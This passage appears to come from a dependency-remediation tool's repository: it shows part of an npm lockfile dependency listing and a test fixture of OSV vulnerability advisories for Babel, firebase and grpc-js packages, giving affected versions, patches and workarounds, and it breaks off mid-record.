acorn@^7.1.0 1.26.0 @types/estree@* @types/node@* acorn@^7.1.0 1.26.1 @types/estree@* @types/node@* acorn@^7.1.0 1.26.2 @types/estree@* @types/node@* acorn@^7.1.0 1.26.3 @types/estree@* @types/node@* acorn@^7.1.0 1.26.4 @types/estree@* @types/node@* acorn@^7.1.0 1.26.5 @types/estree@* @types/node@* acorn@^7.1.0 1.27.0 @types/estree@* @types/node@* acorn@^7.1.0 1.27.1 @types/estree@* @types/node@* acorn@^7.1.0 1.27.2 @types/estree@* @types/node@* acorn@^7.1.0 1.27.3 @types/estree@* @types/node@* acorn@^7.1.0 1.27.4 @types/estree@* @types/node@* acorn@^7.1.0 1.27.5 @types/estree@* @types/node@* acorn@^7.1.0 1.27.6 @types/estree@* @types/node@* acorn@^7.1.0 1.27.7 @types/estree@* @types/node@* acorn@^7.1.0 1.27.8 @types/estree@* @types/node@* acorn@^7.1.0 1.27.9 @types/estree@* @types/node@* acorn@^7.1.0 1.27.10 @types/estree@* @types/node@* acorn@^7.1.0 1.27.11 @types/estree@* @types/node@* acorn@^7.1.0 1.27.12 @types/estree@* @types/node@* acorn@^7.1.0 1.27.13 @types/estree@* @types/node@* acorn@^7.1.0 1.27.14 @types/estree@* @types/node@* acorn@^7.1.0 1.28.0 @types/estree@* @types/node@* acorn@^7.1.0 1.29.0 @types/estree@* @types/node@* acorn@^7.1.0 1.29.1 @types/estree@* @types/node@* acorn@^7.1.0 1.30.0 @types/estree@* @types/node@* acorn@^7.1.0 1.30.1 @types/estree@* @types/node@* acorn@^7.1.0 1.31.0 @types/estree@* @types/node@* acorn@^7.1.0 1.31.1 @types/estree@* @types/node@* acorn@^7.1.0 1.32.0 @types/estree@* @types/node@* acorn@^7.1.0 1.32.1 @types/estree@* @types/node@* acorn@^7.1.0 2.59.0 fsevents@~2.3.2 Opt|fsevents@~2.3.2 2.79.2 Opt|fsevents@~2.3.2 safe-array-concat 1.1.3 call-bind@^1.0.8 call-bound@^1.0.2 get-intrinsic@^1.2.6 has-symbols@^1.1.0 isarray@^2.0.5 safe-buffer 5.1.2 5.2.1 safe-push-apply 1.0.0 es-errors@^1.3.0 isarray@^2.0.5 safe-regex-test 1.1.0 call-bound@^1.0.2 es-errors@^1.3.0 is-regex@^1.2.1 safer-buffer 2.1.2 samsam 1.1.2 sass 1.22.9 chokidar@>=2.0.0 <4.0.0 1.93.3 Opt|@parcel/watcher@^2.4.1 chokidar@^4.0.0 immutable@^5.0.2 source-map-js@>=0.6.2 <2.0.0 saxes 3.1.3 xmlchars@^1.3.1 3.1.11 xmlchars@^2.1.1 semver 5.5.1 5.6.0 5.7.2 6.3.0 6.3.1 7.7.3 serialize-javascript 5.0.1 randombytes@^2.1.0 6.0.0 randombytes@^2.1.0 6.0.2 randombytes@^2.1.0 serve-handler 3.6.2 bytes@3.0.0 content-disposition@0.5.2 fast-url-parser@1.1.3 glob-slasher@1.0.1 mime-types@2.1.18 minimatch@3.0.4 path-is-inside@1.0.2 path-to-regexp@2.2.1 set-blocking 2.0.0 set-function-length 1.2.2 define-data-property@^1.1.4 es-errors@^1.3.0 function-bind@^1.1.2 get-intrinsic@^1.2.4 gopd@^1.0.1 has-property-descriptors@^1.0.2 set-function-name 2.0.2 define-data-property@^1.1.4 es-errors@^1.3.0 functions-have-names@^1.2.3 has-property-descriptors@^1.0.2 set-proto 1.0.0 dunder-proto@^1.0.1 es-errors@^1.3.0 es-object-atoms@^1.0.0 shebang-command 1.2.0 shebang-regex@^1.0.0 2.0.0 shebang-regex@^3.0.0 shebang-regex 1.0.0 3.0.0 side-channel 1.1.0 es-errors@^1.3.0 object-inspect@^1.13.3 side-channel-list@^1.0.0 side-channel-map@^1.0.1 side-channel-weakmap@^1.0.2 side-channel-list 1.0.0 es-errors@^1.3.0 object-inspect@^1.13.3 side-channel-map 1.0.1 call-bound@^1.0.2 es-errors@^1.3.0 get-intrinsic@^1.2.5 object-inspect@^1.13.3 side-channel-weakmap 1.0.2 call-bound@^1.0.2 es-errors@^1.3.0 get-intrinsic@^1.2.5 object-inspect@^1.13.3 side-channel-map@^1.0.1 sigmund 1.0.1 signal-exit 3.0.2 3.0.7 4.1.0 sinon 1.17.7 formatio@1.1.1 lolex@1.3.2 samsam@1.1.2 util@>=0.10.3 <1 source-map 0.5.7 0.6.1 source-map-js 1.2.1 source-map-support 0.5.9 buffer-from@^1.0.0 source-map@^0.6.0 0.5.21 buffer-from@^1.0.0 source-map@^0.6.0 sourcemap-codec 1.4.8 sprintf-js 1.0.3 sshpk 1.15.1 asn1@~0.2.3 assert-plus@^1.0.0 bcrypt-pbkdf@^1.0.0 dashdash@^1.12.0 ecc-jsbn@~0.1.1 getpass@^0.1.1 jsbn@~0.1.0 safer-buffer@^2.0.2 tweetnacl@~0.14.0 1.18.0 asn1@~0.2.3 assert-plus@^1.0.0 bcrypt-pbkdf@^1.0.0 dashdash@^1.12.0 ecc-jsbn@~0.1.1 getpass@^0.1.1 jsbn@~0.1.0 safer-buffer@^2.0.2 tweetnacl@~0.14.0 stealthy-require 1.1.1 stop-iteration-iterator 1.1.0 es-errors@^1.3.0 internal-slot@^1.1.0 stream-events 1.0.5 stubs@^3.0.0 stream-shift 1.0.1 1.0.3 string-width 1.0.2 code-point-at@^1.0.0 is-fullwidth-code-point@^1.0.0 strip-ansi@^3.0.0 2.1.1 is-fullwidth-code-point@^2.0.0 strip-ansi@^4.0.0 3.1.0 emoji-regex@^7.0.1 is-fullwidth-code-point@^2.0.0 strip-ansi@^5.1.0 4.2.3 emoji-regex@^8.0.0 is-fullwidth-code-point@^3.0.0 strip-ansi@^6.0.1 5.1.2 eastasianwidth@^0.2.0 emoji-regex@^9.2.2 strip-ansi@^7.0.1 string.prototype.trim 1.2.10 call-bind@^1.0.8 call-bound@^1.0.2 define-data-property@^1.1.4 define-properties@^1.2.1 es-abstract@^1.23.5 es-object-atoms@^1.0.0 has-property-descriptors@^1.0.2 string.prototype.trimend 1.0.9 call-bind@^1.0.8 call-bound@^1.0.2 define-properties@^1.2.1 es-object-atoms@^1.0.0 string.prototype.trimstart 1.0.8 call-bind@^1.0.7 define-properties@^1.2.1 es-object-atoms@^1.0.0 string_decoder 1.1.1 safe-buffer@~5.1.0 1.3.0 safe-buffer@~5.2.0 strip-ansi 3.0.1 ansi-regex@^2.0.0 4.0.0 ansi-regex@^3.0.0 5.2.0 ansi-regex@^4.1.0 6.0.1 ansi-regex@^5.0.1 7.1.2 ansi-regex@^6.0.1 strip-eof 1.0.0 strip-json-comments 2.0.1 3.1.1 stubs 3.0.0 supports-color 1.2.0 5.4.0 has-flag@^3.0.0 5.5.0 has-flag@^3.0.0 6.0.0 has-flag@^3.0.0 7.2.0 has-flag@^4.0.0 8.1.1 has-flag@^4.0.0 supports-preserve-symlinks-flag 1.0.0 symbol-tree 3.2.2 3.2.4 teeny-request 7.1.3 http-proxy-agent@^5.0.0 https-proxy-agent@^5.0.0 node-fetch@^2.6.1 stream-events@^1.0.5 uuid@^8.0.0 7.2.0 http-proxy-agent@^5.0.0 https-proxy-agent@^5.0.0 node-fetch@^2.6.1 stream-events@^1.0.5 uuid@^8.0.0 9.0.0 http-proxy-agent@^5.0.0 https-proxy-agent@^5.0.0 node-fetch@^2.6.9 stream-events@^1.0.5 uuid@^9.0.0 terser 3.10.11 commander@~2.17.1 source-map@~0.6.1 source-map-support@~0.5.6 3.10.12 commander@~2.17.1 source-map@~0.6.1 source-map-support@~0.5.6 3.10.13 commander@~2.17.1 source-map@~0.6.1 source-map-support@~0.5.6 3.11.0 commander@~2.17.1 source-map@~0.6.1 source-map-support@~0.5.6 3.12.0 commander@~2.17.1 source-map@~0.6.1 source-map-support@~0.5.6 3.13.0 commander@~2.17.1 source-map@~0.6.1 source-map-support@~0.5.6 3.13.1 commander@~2.17.1 source-map@~0.6.1 source-map-support@~0.5.6 3.14.0 commander@~2.17.1 source-map@~0.6.1 source-map-support@~0.5.6 3.14.1 commander@~2.17.1 source-map@~0.6.1 source-map-support@~0.5.6 3.16.0 commander@~2.17.1 source-map@~0.6.1 source-map-support@~0.5.9 3.16.1 commander@~2.17.1 source-map@~0.6.1 source-map-support@~0.5.9 3.17.0 commander@^2.19.0 source-map@~0.6.1 source-map-support@~0.5.10 4.8.1 commander@^2.20.0 source-map@~0.6.1 source-map-support@~0.5.12 time-stamp 1.1.0 tmp 0.0.33 os-tmpdir@~1.0.2 0.2.5 to-fast-properties 2.0.0 to-iso-string 0.0.2 to-regex-range 5.0.1 is-number@^7.0.0 tough-cookie 2.3.3 punycode@^1.4.1 2.3.4 punycode@^1.4.1 2.4.2 psl@^1.1.24 punycode@^1.4.1 2.4.3 psl@^1.1.24 punycode@^1.4.1 2.5.0 psl@^1.1.28 punycode@^2.1.1 3.0.1 ip-regex@^2.1.0 psl@^1.1.28 punycode@^2.1.1 toxic 1.0.1 lodash@^4.17.10 tr46 0.0.3 1.0.1 punycode@^2.1.0 trim-right 1.0.1 trouter 2.0.1 matchit@^1.0.0 tslib 2.3.1 2.8.1 tunnel-agent 0.6.0 safe-buffer@^5.0.1 tweetnacl 0.14.5 type-check 0.3.2 prelude-ls@~1.1.2 type-detect 4.0.8 4.1.0 typed-array-buffer 1.0.3 call-bound@^1.0.3 es-errors@^1.3.0 is-typed-array@^1.1.14 typed-array-byte-length 1.0.3 call-bind@^1.0.8 for-each@^0.3.3 gopd@^1.2.0 has-proto@^1.2.0 is-typed-array@^1.1.14 typed-array-byte-offset 1.0.4 available-typed-arrays@^1.0.7 call-bind@^1.0.8 for-each@^0.3.3 gopd@^1.2.0 has-proto@^1.2.0 is-typed-array@^1.1.15 reflect.getprototypeof@^1.0.9 typed-array-length 1.0.7 call-bind@^1.0.7 for-each@^0.3.3 gopd@^1.0.1 is-typed-array@^1.1.13 possible-typed-array-names@^1.0.0 reflect.getprototypeof@^1.0.6 typedarray 0.0.6 uc.micro 2.1.0 uglify-js 3.6.0 commander@~2.20.0 source-map@~0.6.1 3.19.3 unbox-primitive 1.1.0 call-bound@^1.0.3 has-bigints@^1.0.2 has-symbols@^1.1.0 which-boxed-primitive@^1.1.1 underscore 1.8.3 1.13.7 undici 6.19.7 undici-types 7.16.0 unicode-canonical-property-names-ecmascript 1.0.4 2.0.1 unicode-match-property-ecmascript 1.0.4 unicode-canonical-property-names-ecmascript@^1.0.4 unicode-property-aliases-ecmascript@^1.0.4 2.0.0 unicode-canonical-property-names-ecmascript@^2.0.0 unicode-property-aliases-ecmascript@^2.0.0 unicode-match-property-value-ecmascript 1.1.0 2.2.1 unicode-property-aliases-ecmascript 1.0.5 2.2.0 unistore 3.4.1 3.5.2 update-browserslist-db 1.1.4 Scope peer|browserslist@>= 4.21.0 escalade@^3.2.0 picocolors@^1.1.1 upper-case 1.1.3 uri-js 4.4.1 punycode@^2.1.0 util 0.12.5 inherits@^2.0.3 is-arguments@^1.0.4 is-generator-function@^1.0.7 is-typed-array@^1.1.3 which-typed-array@^1.1.2 util-deprecate 1.0.2 uuid 3.3.2 3.4.0 8.3.2 9.0.1 verror 1.10.0 assert-plus@^1.0.0 core-util-is@1.0.2 extsprintf@^1.2.0 vinyl 2.2.0 clone@^2.1.1 clone-buffer@^1.0.0 clone-stats@^1.0.0 cloneable-readable@^1.0.0 remove-trailing-separator@^1.0.1 replace-ext@^1.0.0 2.2.1 clone@^2.1.1 clone-buffer@^1.0.0 clone-stats@^1.0.0 cloneable-readable@^1.0.0 remove-trailing-separator@^1.0.1 replace-ext@^1.0.0 vinyl-sourcemaps-apply 0.2.1 source-map@^0.5.1 w3c-hr-time 1.0.1 browser-process-hrtime@^0.1.2 1.0.2 browser-process-hrtime@^1.0.0 w3c-xmlserializer 1.1.2 domexception@^1.0.1 webidl-conversions@^4.0.2 xml-name-validator@^3.0.0 web-animations-js 2.3.1 2.3.2 web-vitals 4.2.4 webidl-conversions 3.0.1 4.0.2 websocket-driver 0.7.4 http-parser-js@>=0.5.1 safe-buffer@>=5.1.0 websocket-extensions@>=0.1.1 websocket-extensions 0.1.4 whatwg-encoding 1.0.5 iconv-lite@0.4.24 whatwg-fetch 2.0.4 3.0.0 3.6.20 whatwg-mimetype 2.2.0 2.3.0 whatwg-url 5.0.0 tr46@~0.0.3 webidl-conversions@^3.0.0 7.0.0 lodash.sortby@^4.7.0 tr46@^1.0.1 webidl-conversions@^4.0.2 7.1.0 lodash.sortby@^4.7.0 tr46@^1.0.1 webidl-conversions@^4.0.2 which 1.3.1 isexe@^2.0.0 2.0.2 isexe@^2.0.0 which-boxed-primitive 1.1.1 is-bigint@^1.1.0 is-boolean-object@^1.2.1 is-number-object@^1.1.1 is-string@^1.1.1 is-symbol@^1.1.1 which-builtin-type 1.2.1 call-bound@^1.0.2 function.prototype.name@^1.1.6 has-tostringtag@^1.0.2 is-async-function@^2.0.0 is-date-object@^1.1.0 is-finalizationregistry@^1.1.0 is-generator-function@^1.0.10 is-regex@^1.2.1 is-weakref@^1.0.2 isarray@^2.0.5 which-boxed-primitive@^1.1.0 which-collection@^1.0.2 which-typed-array@^1.1.16 which-collection 1.0.2 is-map@^2.0.3 is-set@^2.0.3 is-weakmap@^2.0.2 is-weakset@^2.0.3 which-module 2.0.0 2.0.1 which-typed-array 1.1.19 available-typed-arrays@^1.0.7 call-bind@^1.0.8 call-bound@^1.0.4 for-each@^0.3.5 get-proto@^1.0.1 gopd@^1.2.0 has-tostringtag@^1.0.2 wide-align 1.1.3 string-width@^1.0.2 || 2 word-wrap 1.2.5 wordwrap 1.0.0 workerpool 6.1.0 6.2.0 6.5.1 wrap-ansi 2.1.0 string-width@^1.0.1 strip-ansi@^3.0.1 5.1.0 ansi-styles@^3.2.0 string-width@^3.0.0 strip-ansi@^5.0.0 7.0.0 ansi-styles@^4.0.0 string-width@^4.1.0 strip-ansi@^6.0.0 8.1.0 ansi-styles@^6.1.0 string-width@^5.0.1 strip-ansi@^7.0.1 wrappy 1.0.2 ws 6.2.1 async-limiter@~1.0.0 6.2.3 async-limiter@~1.0.0 7.1.2 async-limiter@^1.0.0 7.5.10 Scope peer|bufferutil@^4.0.1 Scope peer|utf-8-validate@^5.0.2 xml-name-validator 3.0.0 xmlchars 1.3.1 2.2.0 xmlcreate 2.0.4 xmlhttprequest 1.8.0 xregexp 4.0.0 y18n 4.0.0 4.0.3 5.0.8 yallist 2.1.2 3.1.1 4.0.0 yargs 12.0.2 cliui@^4.0.0 decamelize@^2.0.0 find-up@^3.0.0 get-caller-file@^1.0.1 os-locale@^3.0.0 require-directory@^2.1.1 require-main-filename@^1.0.1 set-blocking@^2.0.0 string-width@^2.0.0 which-module@^2.0.0 y18n@^3.2.1 || ^4.0.0 yargs-parser@^10.1.0 12.0.5 cliui@^4.0.0 decamelize@^1.2.0 find-up@^3.0.0 get-caller-file@^1.0.1 os-locale@^3.0.0 require-directory@^2.1.1 require-main-filename@^1.0.1 set-blocking@^2.0.0 string-width@^2.0.0 which-module@^2.0.0 y18n@^3.2.1 || ^4.0.0 yargs-parser@^11.1.1 13.3.2 cliui@^5.0.0 find-up@^3.0.0 get-caller-file@^2.0.1 require-directory@^2.1.1 require-main-filename@^2.0.0 set-blocking@^2.0.0 string-width@^3.0.0 which-module@^2.0.0 y18n@^4.0.0 yargs-parser@^13.1.2 16.2.0 cliui@^7.0.2 escalade@^3.1.1 get-caller-file@^2.0.5 require-directory@^2.1.1 string-width@^4.2.0 y18n@^5.0.5 yargs-parser@^20.2.2 17.7.2 cliui@^8.0.1 escalade@^3.1.1 get-caller-file@^2.0.5 require-directory@^2.1.1 string-width@^4.2.3 y18n@^5.0.5 yargs-parser@^21.1.1 yargs-parser 10.1.0 camelcase@^4.1.0 11.1.1 camelcase@^5.0.0 decamelize@^1.2.0 13.1.2 camelcase@^5.0.0 decamelize@^1.2.0 20.2.4 20.2.9 21.1.1 yargs-unparser 1.6.0 flat@^4.1.0 lodash@^4.17.15 yargs@^13.3.0 2.0.0 camelcase@^6.0.0 decamelize@^4.0.0 flat@^5.0.2 is-plain-obj@^2.1.0 yauzl 2.10.0 buffer-crc32@~0.2.3 fd-slicer@~1.1.0 yocto-queue 0.1.0 ================================================ FILE: internal/remediation/testdata/santatracker/vulns.json ================================================ { "vulns": [ { "schema_version": "1.7.3", "id": "GHSA-968p-4wvh-cqc8", "published": "2025-03-11T20:30:18Z", "modified": "2025-04-16T15:39:50Z", "aliases": [ "CVE-2025-27789" ], "related": [ "CGA-3phx-qxx7-8vqw", "CGA-46ch-ch69-qmcw", "CGA-g6rv-q8mg-pp3f", "CGA-g7xj-r4gh-6jhr", "CGA-j8cm-jvwv-37vw", "CGA-m6wq-wmrx-cp34", "CGA-mwpg-44pj-qpj8", "CGA-qgr4-9ff9-9j58", "CGA-rh34-93h2-vxqh", "CGA-v5pv-jcc5-rq8m" ], "summary": "Babel has inefficient RegExp complexity in generated code with .replace when transpiling named capturing groups", "details": "### Impact\n\nWhen using Babel to compile [regular expression named capturing groups](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Regular_expressions/Named_capturing_group), Babel will generate a polyfill for the `.replace` method that has quadratic complexity on some specific replacement pattern strings (i.e. the second argument passed to `.replace`).\n\nYour generated code is vulnerable if _all_ the following conditions are true:\n- You use Babel to compile [regular expression named capturing groups](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Regular_expressions/Named_capturing_group)\n- You use the `.replace` method on a regular expression that contains named capturing groups\n- **Your code uses untrusted strings as the second argument of `.replace`**\n\nIf you are using `@babel/preset-env` with the [`targets`](https://babeljs.io/docs/options#targets) option, the transform that injects the vulnerable code is automatically enabled if:\n- you use [_duplicated_ named capturing groups](https://github.com/tc39/proposal-duplicate-named-capturing-groups), and target any browser older than Chrome/Edge 126, Opera 112, Firefox 129, Safari 17.4, or Node.js 23\n- you use any [named capturing groups](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Regular_expressions/Named_capturing_group), and target any browser older than Chrome 64, Opera 71, Edge 79, Firefox 78, Safari 11.1, or Node.js 10\n\nYou can verify what transforms `@babel/preset-env` is using by enabling the [`debug` option](https://babeljs.io/docs/babel-preset-env#debug).\n\n\n### Patches\n\nThis problem has been fixed in `@babel/helpers` and `@babel/runtime` 7.26.10 and 8.0.0-alpha.17, please upgrade. It's likely that you do not directly depend on `@babel/helpers`, and instead you depend on `@babel/core` (which itself depends on `@babel/helpers`). Upgrading to `@babel/core` 7.26.10 is not required, but it guarantees that you are on a new enough `@babel/helpers` version.\n\nPlease note that just updating your Babel dependencies is not enough: you will also need to re-compile your code.\n\n### Workarounds\n\nIf you are passing user-provided strings as the second argument of `.replace` on regular expressions that contain named capturing groups, validate the input and make sure it does not contain the substring `$\u003c` if it's then not followed by `\u003e` (possibly with other characters in between).\n\n### References\n\nThis vulnerability was reported and fixed in https://github.com/babel/babel/pull/17173.", "affected": [ { "package": { "name": "@babel/helpers", "ecosystem": "npm", "purl": "pkg:npm/%40babel/helpers" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "7.26.10" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-968p-4wvh-cqc8/GHSA-968p-4wvh-cqc8.json" } }, { "package": { "name": "@babel/runtime", "ecosystem": "npm", "purl": "pkg:npm/%40babel/runtime" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "7.26.10" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-968p-4wvh-cqc8/GHSA-968p-4wvh-cqc8.json" } }, { "package": { "name": "@babel/runtime-corejs2", "ecosystem": "npm", "purl": "pkg:npm/%40babel/runtime-corejs2" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "7.26.10" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-968p-4wvh-cqc8/GHSA-968p-4wvh-cqc8.json" } }, { "package": { "name": "@babel/runtime-corejs3", "ecosystem": "npm", "purl": "pkg:npm/%40babel/runtime-corejs3" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "7.26.10" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-968p-4wvh-cqc8/GHSA-968p-4wvh-cqc8.json" } }, { "package": { "name": "@babel/helpers", "ecosystem": "npm", "purl": "pkg:npm/%40babel/helpers" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "8.0.0-alpha.0" }, { "fixed": "8.0.0-alpha.17" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c 8.0.0-alpha.16", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-968p-4wvh-cqc8/GHSA-968p-4wvh-cqc8.json" } }, { "package": { "name": "@babel/runtime", "ecosystem": "npm", "purl": "pkg:npm/%40babel/runtime" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "8.0.0-alpha.0" }, { "fixed": "8.0.0-alpha.17" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c 8.0.0-alpha.16", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-968p-4wvh-cqc8/GHSA-968p-4wvh-cqc8.json" } }, { "package": { "name": "@babel/runtime-corejs2", "ecosystem": "npm", "purl": "pkg:npm/%40babel/runtime-corejs2" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "8.0.0-alpha.0" }, { "fixed": "8.0.0-alpha.17" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c 8.0.0-alpha.16", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-968p-4wvh-cqc8/GHSA-968p-4wvh-cqc8.json" } }, { "package": { "name": "@babel/runtime-corejs3", "ecosystem": "npm", "purl": "pkg:npm/%40babel/runtime-corejs3" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "8.0.0-alpha.0" }, { "fixed": "8.0.0-alpha.17" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c 8.0.0-alpha.16", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-968p-4wvh-cqc8/GHSA-968p-4wvh-cqc8.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/babel/babel/security/advisories/GHSA-968p-4wvh-cqc8" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27789" }, { "type": "WEB", "url": "https://github.com/babel/babel/pull/17173" }, { "type": "WEB", "url": "https://github.com/babel/babel/commit/d5952e80c0faa5ec20e35085531b6e572d31dad4" }, { "type": "PACKAGE", "url": "https://github.com/babel/babel" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2025-03-11T20:30:18Z", "nvd_published_at": "2025-03-11T20:15:18Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-67hx-6x53-jw92", "published": "2023-10-16T13:55:36Z", "modified": "2024-04-04T14:26:10Z", "aliases": [ "CVE-2023-45133" ], "related": [ "CVE-2023-45133" ], "summary": "Babel vulnerable to arbitrary code execution when compiling specifically crafted malicious code", "details": "### Impact\n\nUsing Babel to compile code that was specifically crafted by an attacker can lead to arbitrary code execution during compilation, when using plugins that rely on the `path.evaluate()`or `path.evaluateTruthy()` internal Babel methods.\n\nKnown affected plugins are:\n- `@babel/plugin-transform-runtime`\n- `@babel/preset-env` when using its [`useBuiltIns`](https://babeljs.io/docs/babel-preset-env#usebuiltins) option\n- Any \"polyfill provider\" plugin that depends on `@babel/helper-define-polyfill-provider`, such as `babel-plugin-polyfill-corejs3`, `babel-plugin-polyfill-corejs2`, `babel-plugin-polyfill-es-shims`, `babel-plugin-polyfill-regenerator`\n\nNo other plugins under the `@babel/` namespace are impacted, but third-party plugins might be.\n\n**Users that only compile trusted code are not impacted.**\n\n### Patches\n\nThe vulnerability has been fixed in `@babel/traverse@7.23.2`.\n\nBabel 6 does not receive security fixes anymore (see [Babel's security policy](https://github.com/babel/babel/security/policy)), hence there is no patch planned for `babel-traverse@6`.\n\n### Workarounds\n\n- Upgrade `@babel/traverse` to v7.23.2 or higher. You can do this by deleting it from your package manager's lockfile and re-installing the dependencies. `@babel/core` \u003e=7.23.2 will automatically pull in a non-vulnerable version.\n- If you cannot upgrade `@babel/traverse` and are using one of the affected packages mentioned above, upgrade them to their latest version to avoid triggering the vulnerable code path in affected `@babel/traverse` versions:\n - `@babel/plugin-transform-runtime` v7.23.2\n - `@babel/preset-env` v7.23.2\n - `@babel/helper-define-polyfill-provider` v0.4.3\n - `babel-plugin-polyfill-corejs2` v0.4.6\n - `babel-plugin-polyfill-corejs3` v0.8.5\n - `babel-plugin-polyfill-es-shims` v0.10.0\n - `babel-plugin-polyfill-regenerator` v0.5.3", "affected": [ { "package": { "name": "@babel/traverse", "ecosystem": "npm", "purl": "pkg:npm/%40babel/traverse" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "7.23.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-67hx-6x53-jw92/GHSA-67hx-6x53-jw92.json" } }, { "package": { "name": "@babel/traverse", "ecosystem": "npm", "purl": "pkg:npm/%40babel/traverse" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "8.0.0-alpha.0" }, { "fixed": "8.0.0-alpha.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-67hx-6x53-jw92/GHSA-67hx-6x53-jw92.json" } }, { "package": { "name": "babel-traverse", "ecosystem": "npm", "purl": "pkg:npm/babel-traverse" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c 7.23.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-67hx-6x53-jw92/GHSA-67hx-6x53-jw92.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/babel/babel/security/advisories/GHSA-67hx-6x53-jw92" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45133" }, { "type": "WEB", "url": "https://github.com/babel/babel/pull/16033" }, { "type": "WEB", "url": "https://github.com/babel/babel/commit/b13376b346946e3f62fc0848c1d2a23223314c82" }, { "type": "WEB", "url": "https://babeljs.io/blog/2023/10/16/cve-2023-45133" }, { "type": "PACKAGE", "url": "https://github.com/babel/babel" }, { "type": "WEB", "url": "https://github.com/babel/babel/releases/tag/v7.23.2" }, { "type": "WEB", "url": "https://github.com/babel/babel/releases/tag/v8.0.0-alpha.4" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00026.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5528" } ], "database_specific": { "cwe_ids": [ "CWE-184", "CWE-697" ], "github_reviewed": true, "github_reviewed_at": "2023-10-16T13:55:36Z", "nvd_published_at": "2023-10-12T17:15:09Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-fpm5-vv97-jfwg", "published": "2021-05-18T01:57:24Z", "modified": "2025-01-14T08:56:55.449807Z", "aliases": [ "CVE-2020-7765" ], "summary": "Uncontrolled Resource Consumption in firebase", "details": "This affects the package @firebase/util before 0.3.4. This vulnerability relates to the deepExtend function within the DeepCopy.ts file. Depending on if user input is provided, an attacker can overwrite and pollute the object prototype of a program.", "affected": [ { "package": { "name": "@firebase/util", "ecosystem": "npm", "purl": "pkg:npm/%40firebase/util" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.3.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-fpm5-vv97-jfwg/GHSA-fpm5-vv97-jfwg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7765" }, { "type": "WEB", "url": "https://github.com/firebase/firebase-js-sdk/pull/4001" }, { "type": "WEB", "url": "https://github.com/firebase/firebase-js-sdk/commit/9cf727fcc3d049551b16ae0698ac33dc2fe45ada" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-FIREBASEUTIL-1038324" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-04-15T21:39:07Z", "nvd_published_at": "2020-11-16T12:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7v5v-9h63-cj86", "published": "2024-06-10T21:38:05Z", "modified": "2024-07-15T22:12:28.175716Z", "aliases": [ "CVE-2024-37168" ], "related": [ "CGA-3vxq-pj3w-xvh2", "CGA-w377-c6cx-3vgh", "CVE-2024-37168" ], "summary": "@grpc/grpc-js can allocate memory for incoming messages well above configured limits", "details": "### Impact\nThere are two separate code paths in which memory can be allocated per message in excess of the `grpc.max_receive_message_length` channel option:\n\n 1. If an incoming message has a size on the wire greater than the configured limit, the entire message is buffered before it is discarded.\n 2. If an incoming message has a size within the limit on the wire but decompresses to a size greater than the limit, the entire message is decompressed into memory, and on the server is not discarded.\n\n### Patches\n\nThis 